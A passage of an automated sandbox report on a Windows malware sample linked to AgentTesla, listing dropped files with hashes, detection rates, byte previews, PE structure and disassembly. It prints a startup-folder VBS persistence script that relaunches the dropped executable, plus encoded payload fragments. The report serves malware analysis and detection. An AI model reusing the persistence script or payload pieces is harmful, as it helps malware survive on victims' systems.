                                  • 208.95.112.1
                                  NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  rComprobante_swift_8676534657698632.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  28uMwHvbTD.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1
                                  e4Iw3lwFJ5.exeGet hashmaliciousAgentTeslaBrowse
                                  • 208.95.112.1

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Lityerses\unjuridically.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1036800
                                  Entropy (8bit):6.894564802528682
                                  Encrypted:false
                                  SSDEEP:12288:Jtb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNDPPpHrYPTYC2ajbP50s3o32VV6A:Jtb20pkaCqT5TBWgNjVYrpv13G+V6A
                                  MD5:BC7FEE37D8D779B635750BCE96B9ECD9
                                  SHA1:7EA7EB2001C6A29D93F2D780DBF2EF37070689BE
                                  SHA-256:382B40CE3E7D7FC44A80D1B9190914A401C968BE78C7115A8E4E3CCD40B8888D
                                  SHA-512:1FCAFCD2FC26508F1C18D5261CFAD45A43B98DC6BB67665C8C3D89AF120CB1EAAD7204B46901424927F034FF3F9E8F72724BD3A5250E79C7EC5457ECFD6EB70E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 58%
                                  • Antivirus: Virustotal, Detection: 62%, Browse
                                  Reputation:low
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d...........'.a....H.k....H.h.....H.i....}%....}5............~.......k......o.....1......j....Rich....................PE..L.....hg..........".................t_............@..........................@............@...@.......@......................p..|....@...@......................Ll..................................0'..@............................................text...O........................... ..`.rdata..B...........................@..@.data...T........b..................@....rsrc....@...@...B..................@..@.reloc..t............,..............@..B................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\acrorrheuma

                                  Download File
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):245248
                                  Entropy (8bit):6.5490173775607365
                                  Encrypted:false
                                  SSDEEP:6144:PceANBRND9iy7zfovLfMJny1bZZYUlqzEO3IL0u9SYXAgrLjc98:ZANv3fY5TAe4u9SYXAejm8
                                  MD5:FD16AC67E115A223CC50F5019A3F052B
                                  SHA1:1D703AC8FF6EB9450697CD1876405AE608E9CF37
                                  SHA-256:11374F7B169A7DD18927070D7961F1050FC8B6A98B9803EB15A2687F4A62D89D
                                  SHA-512:593582A3D9EB4D2A9E0A35099819A14FD3B6633456A2F33C48652BF97F615E34ABC435BDF7C9144E54F9E7D6B88480110892B51E9D5D29E73698B80D493EF2FD
                                  Malicious:false
                                  Reputation:low
                                  Preview:z..W6AB1V9N9..RX.5AB1R9NyM7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1.9N9C(.VW.H...8..lc:1$.10^5K/TmT369Z5bS7.<L#.;6wq...?V*\c:_Rs5AB1R9Ni.7R.V6A1.._N9M7RXW5.B3S2O2M7.[W5IB1R9N9..QXW.AB1.:N9MwRXw5AB3R9J9M7RXW5EB1R9N9M7r\W5CB1R9N9O7..W5QB1B9N9M'RXG5AB1R9^9M7RXW5AB1R5.:MxRXW5.A1.<N9M7RXW5AB1R9N9M7RXW1AN1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB.R9F9M7RXW5AB1R1n9M.RXW5AB1R9N9cC7 #5ABU.:N9m7RX.6AB3R9N9M7RXW5AB1R.N9-. +%VAB1.<N9M.QXW3AB1.:N9M7RXW5AB1R9.9Mw|*2Y.!1R5N9M7R\W5CB1R.M9M7RXW5AB1R9NyM7.XW5AB1R9N9M7RXW5..2R9N9M.RXW7AG1..L9%.SXT5AB0R9H9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB1R9N9M7RXW5AB,......l.*.K 6...^.4..D..;..6.,.LF.~.O....jBT..5.M..0...".IGHS....j8\DO*b%.AX.*....|cE.r.?#.(..?p.<?j.d...q.....6:g...,.."-\|X>I!R|.6S 0X.;.8M7RX......P5|.uT:_v#*o..fJ/c...GN9MSRXWGAB139N9.7RX85AB_R9NGM7R&W5A.1R9.9M7eXW5dB1RTN9M.RXWKAB1.DA6..1$..B1R9N...b.:...n.....#.)n#z..*....]..N*.%z.~..\.^..&.RH..oUYQ1D@6V:B.C|....CF5W;I=N;oV........t...&...b(.29M7RXW.AB.R9N..7.XW5.B.R..9M7.W.A.1..9

                                  C:\Users\user\AppData\Local\Temp\aut9C72.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                  C:\Users\user\AppData\Local\Temp\aut9D2F.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.

                                  C:\Users\user\AppData\Local\Temp\autA00C.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                  C:\Users\user\AppData\Local\Temp\autA0A9.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.

                                  C:\Users\user\AppData\Local\Temp\autD322.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                  C:\Users\user\AppData\Local\Temp\autD391.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.

                                  C:\Users\user\AppData\Local\Temp\batchers

                                  Download File
                                  Process:C:\Users\user\Desktop\RHOqJ5BrHW.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):178198
                                  Entropy (8bit):3.174329330978397
                                  Encrypted:false
                                  SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fg:iaNibHCIL8aDfffXz6w43Ck/sqoHklX
                                  MD5:A09D7CF7B10B8AF8265563ECFD0DEC02
                                  SHA1:8603B072F64A75D50663F4BA60F94DE0C7E59FD4
                                  SHA-256:01937F48007048229842F0743CC2D2F80330289E8A3FA26DBF32A13D6C95B339
                                  SHA-512:029C037CD58C55420C34BD68CC467947B877888E26E4C84D8FA68F97D667D7EE4A6DED7AC5152BA0C0C61182205B58D9F4A5CC6C409EDFDFAB4074DE3AB49764
                                  Malicious:false
                                  Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):288
                                  Entropy (8bit):3.4322289179426537
                                  Encrypted:false
                                  SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX14lDRw1blanriIM8lfQVn:DsO+vNlzQ1oFwBlYmA2n
                                  MD5:4794EC5AFF4E7110E4946325ABF2DEE2
                                  SHA1:2DD0F602A10438D64DF4CACDE7FE878588B44F7F
                                  SHA-256:E684CB832D2CB7130B1627CDEE3F6B2C6D9DCC26954EC436697B37D1915B6DB8
                                  SHA-512:051ABECD3344C073F810934F8D451B6D879C30707C33A0B9F37F707FC3E9593F9F172FB4432B5BBD908BC23701EAD26410E1474ADE773C53E6F5A94091BB92D7
                                  Malicious:true
                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.L.i.t.y.e.r.s.e.s.\.u.n.j.u.r.i.d.i.c.a.l.l.y...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):6.894564802528682
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.70%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:RHOqJ5BrHW.exe
                                  File size:1'036'800 bytes
                                  MD5:bc7fee37d8d779b635750bce96b9ecd9
                                  SHA1:7ea7eb2001c6a29d93f2d780dbf2ef37070689be
                                  SHA256:382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d
                                  SHA512:1fcafcd2fc26508f1c18d5261cfad45a43b98dc6bb67665c8c3d89af120cb1eaad7204b46901424927f034ff3f9e8f72724bd3a5250e79c7ec5457ecfd6eb70e
                                  SSDEEP:12288:Jtb20Qc3lT7af41ePBRYuQLKpqeUhbTv5OFgNDPPpHrYPTYC2ajbP50s3o32VV6A:Jtb20pkaCqT5TBWgNjVYrpv13G+V6A
                                  TLSH:6B25BF2363DE8365C3B26273BA15B701AE7F782506B1F56B2FD4093DE820162525EB73
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                  File Icon

                                  Icon Hash:aaf3e3e3938382a0

                                  Static PE Info

                                  General

                                  Entrypoint:0x425f74
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6768EE06 [Mon Dec 23 04:58:46 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:c1d258acab237961164a925272293413

                                  Entrypoint Preview

                                  Instruction
                                  call 00007F18E0DC4CCFh
                                  jmp 00007F18E0DB7CE4h
                                  int3
                                  int3
                                  push edi
                                  push esi
                                  mov esi, dword ptr [esp+10h]
                                  mov ecx, dword ptr [esp+14h]
                                  mov edi, dword ptr [esp+0Ch]
                                  mov eax, ecx
                                  mov edx, ecx
                                  add eax, esi
                                  cmp edi, esi
                                  jbe 00007F18E0DB7E6Ah
                                  cmp edi, eax
                                  jc 00007F18E0DB81CEh
                                  bt dword ptr [004C0158h], 01h
                                  jnc 00007F18E0DB7E69h
                                  rep movsb
                                  jmp 00007F18E0DB817Ch
                                  cmp ecx, 00000080h
                                  jc 00007F18E0DB8034h
                                  mov eax, edi
                                  xor eax, esi
                                  test eax, 0000000Fh
                                  jne 00007F18E0DB7E70h
                                  bt dword ptr [004BA370h], 01h
                                  jc 00007F18E0DB8340h
                                  bt dword ptr [004C0158h], 00000000h
                                  jnc 00007F18E0DB800Dh
                                  test edi, 00000003h
                                  jne 00007F18E0DB801Eh
                                  test esi, 00000003h
                                  jne 00007F18E0DB7FFDh
                                  bt edi, 02h
                                  jnc 00007F18E0DB7E6Fh
                                  mov eax, dword ptr [esi]
                                  sub ecx, 04h
                                  lea esi, dword ptr [esi+04h]
                                  mov dword ptr [edi], eax
                                  lea edi, dword ptr [edi+04h]
                                  bt edi, 03h
                                  jnc 00007F18E0DB7E73h
                                  movq xmm1, qword ptr [esi]
                                  sub ecx, 08h
                                  lea esi, dword ptr [esi+08h]
                                  movq qword ptr [edi], xmm1
                                  lea edi, dword ptr [edi+08h]
                                  test esi, 00000007h
                                  je 00007F18E0DB7EC5h
                                  bt esi, 03h
                                  jnc 00007F18E0DB7F18h
                                  movdqa xmm1, dqword ptr [esi+00h]

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2012 UPD4 build 61030
                                  • [RES] VS2012 UPD4 build 61030
                                  • [LNK] VS2012 UPD4 build 61030

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x34080.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xf90000x6c4c.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x8d0000x2cc420x2ce00ede9d722bf5e27d1f93aaf9e53240a22False0.3183049704038997data5.682422502790088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0xc40000x340800x342006b1531235337d4e5a16b1920d56b90baFalse0.8729485161870504data7.749633155377708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0xf90000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
